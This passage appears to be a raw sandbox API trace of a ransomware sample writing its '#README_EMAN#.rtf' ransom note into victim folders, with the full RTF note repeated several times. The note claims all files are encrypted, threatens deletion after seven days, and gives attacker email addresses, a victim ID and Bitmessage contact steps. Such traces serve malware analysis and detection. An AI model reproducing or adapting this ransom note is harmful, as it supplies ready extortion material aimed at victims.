\\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n=typeof b)return b;try{\x03\x1e", lpUsedDefaultChar=0x0) returned 8717 [0283.745] WriteFile (in: hFile=0x2cc, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0283.746] CloseHandle (hObject=0x2cc) returned 1 [0283.746] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\#readme_eman#.rtf")) returned 0xffffffff [0283.746] GetLastError () returned 0x2 [0283.746] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sv\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0283.747] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.747] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please 